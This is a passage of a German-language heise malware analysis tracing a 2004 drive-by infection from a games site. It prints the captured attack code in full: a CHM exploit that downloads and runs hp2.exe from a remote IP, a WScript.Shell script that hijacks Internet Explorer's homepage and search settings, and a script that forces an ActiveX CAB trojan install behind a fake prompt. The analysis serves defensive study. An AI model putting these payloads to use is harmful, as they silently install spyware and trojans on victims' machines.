heise PlusAbo
Anzeige

Schädlingen auf der Spur

Seite 2: hp2.htm

Inhaltsverzeichnis

[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"

Dieser chm-Exploit enthält die Datei hp2.htm:

[Anm. des Ăśbersetzers: CHM-Dateien sind kompilierte Hilfedateien, deren HTML/Script-Code mit den Rechten des lokalen Systems ausgefĂĽhrt wird.]

<script language="vbscript">
 Function Exists(filename)
 On Error Resume Next
 LoadPicture(filename)
 Exists = Err.Number = 481
 End Function 
</script>
<script language="javascript">
var oPopup = window.createPopup();
function showPopup()
{
 oPopup.document.body.innerHTML = 
 "<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
 oPopup.show(0,0,1,1,document.body);
}
showPopup()
wmplayerpaths= [
 "C:\\Programmer\\Windows Media Player\\wmplayer.exe",
 "C:\\Program\\Windows Media Player\\wmplayer.exe",
 "C:\\Programme\\Windows Media Player\\wmplayer.exe",
 "C:\\Programmi\\Windows Media Player\\wmplayer.exe",
 "C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
 "C:\\Programas\\Windows Media Player\\wmplayer.exe",
 "C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
 "C:\\Program Files\\Windows Media Player\\wmplayer.exe"
];
for (i=0;i<wmplayerpaths.length;i++) {
 wmplayerpath = wmplayerpaths[i];
 if (Exists(wmplayerpath))
 break;
}
function getPath(url) {
 start = url.indexOf('http:')
 end = url.indexOf('HP2.CHM')
 return url.substring(start, end);
}
payloadURL = getPath(location.href)+'hp2.exe';
var x = new ActiveXObject("Microsoft.XMLHTTP"); 
 x.Open("GET",payloadURL,0); 
 x.Send(); 
var s = new ActiveXObject("ADODB.Stream");
 s.Mode = 3;
 s.Type = 1;
 s.Open();
 s.Write(x.responseBody);
 s.SaveToFile(wmplayerpath,2);
var win=null;
function NewWindow(mypage,myname,w,h,scroll,pos){
 if(pos=="random"){
 LeftPosition=(screen.width)?Math.floor(Math.random()*
 (screen.width-w)):100;
 TopPosition=(screen.height)?Math.floor(Math.random()*
 ((screen.height-h)-75)):100;
 }
 if(pos=="center"){
 LeftPosition=(screen.width)?(screen.width-w)/2:100;
 TopPosition=(screen.height)?(screen.height-h)/2:100;
 }
 else if((pos!="center" && pos!="random") ||
 pos==null){
 LeftPosition=0;TopPosition=20
 }
 settings='width='+w+',height='+h+',top='
 +TopPosition+',left='+LeftPosition
 +',scrollbars='+scroll
 +',location=no,directories=no,status=no,menubar=no,toolbar=no'
 +',resizable=no';
 win=window.open(mypage,myname,settings);
}
location.href = "mms://";
</script>

Und weiter gehts:

[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"

<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
  "http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
  "http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
  "http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst",
  "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
  "http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst",
  "no");
</script>
<script language=javascript>
self.close()
</script>
</html>

Soeben hat das Skript meine Home-Page verstellt, genau wie die Standard-Suchmaschine... Nett, richtig nett. Aber das war noch nicht alles... Da wurde auch diese Datei "hp2.exe" heruntergeladen und über den chm-Exploit ausgeführt. In den Log-Dateien findet sich tatsächlich:

[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"

hp2.exe ist ein sogenannter "Dropper". Das heisst, es ist ein kleines Programm, das ein Programm (oder manchmal auch mehrere) als Daten huckepack transportiert. Startet man das Programm, schreibt es seine Daten in eine Datei und startet das resultierende Programm. hp2.exe ist eine UPX-komprimierte EXE-Datei, die beim Start www.totalvelocity.com/Bundling/tvmupdater4bp5.exe aus dem Netz lädt. Dieses Programm installiert oder aktualisiert die Spyware "TV Media Display".

Jetzt folgte ich einem der Links auf der Seite, der allerdings ein Flash-Plugin benötigte. Weil ich das nicht installiert hatte, ging ich "zurück". Da ich jetzt von meinem ersten Besuch auf der yahoogamez-Seite bereits ein Cookie auf meinem Rechner hatte, machte eine der Dateien (popup.js), diesmal etwas anderes:

if ((document.cookie.indexOf("popuptraffic") != -1 ) &&
  (document.cookie.indexOf("popupsponsor") == -1)){
  var expdate = new Date((new Date()).getTime() + 1800000);
  document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
  document.write("<script language=\"JavaScript\"
    src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
}

[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"

var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
document.write(
 '<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
function retry() {
  if(retry_cnt>0) {
    alert("To install latest AT- Games update, please click Yes");
    start_download();
    retry_cnt--;
  } else {
    //alert("This is a 1 time install, once you click Open
             it will never pop up this message again");
    //downloads_manager.window.location =
           "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
  }
}
function start_download()
{
  var bname=navigator.appName;
  var bver=parseInt(navigator.appVersion);
  if ( navigator.platform && navigator.platform != 'Win32' ){
    //alert("Sorry, your browser is not WIN32 Compatible");
  }
  if (bname == 'Microsoft Internet Explorer' && bver >= 2){
    document_code = '<html><head>\n';
    document_code += '<\/head><body>\n';
    document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
                  classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
                  codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab"
                  HEIGHT=0 WIDTH=0></object>\n';
    document_code += '<\/body><\/html>';
    downloads_manager.document.write(document_code);
    downloads_manager.document.close();
  }
  else if (bname == 'Netscape' && bver >= 4) {
    trigger = netscape.softupdate.Trigger;
    if (trigger.UpdateEnabled) {
      //trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)               
    } else {
      location.replace(exepath);
    }
  } else {
    location.replace(exepath);
  }
}
start_download();

[Anm. des Übersetzers: Das Skript versucht zunächst ein ActiveX-Control automatisch zu installieren, indem es eine CODEBASE angibt, die auf eine externe CAB-Datei verweist. Klappt das nicht (onerror), erscheint eine Meldung, dass man zur Installation des Spieles "Yes" klicken müsse, und das Skript versucht es erneut.]

[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

Diese CAB-Datei enthält zwei Dateien:

ATPartners.inf - 403 bytes
ATPartnets.dll - 96,256 bytes

Die DLL-Datei erkennt Antiviren-Software als den Trojaner Win32/TrojanDownloader.Rameh.C.

An dieser Stelle beende ich den ersten Teil. Im nächsten untersuche ich genauer, was diese Malware so alles anstellt und was passiert, wenn ich den Internet Explorer das nächste Mal starte und meine neue Homepage besuche.

http://www.labreatechnologies.com

Hier gehts zu: Schädlingen auf der Spur, Teil 2 (ju)

Beliebte Bestenlisten

Alle Angebote
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten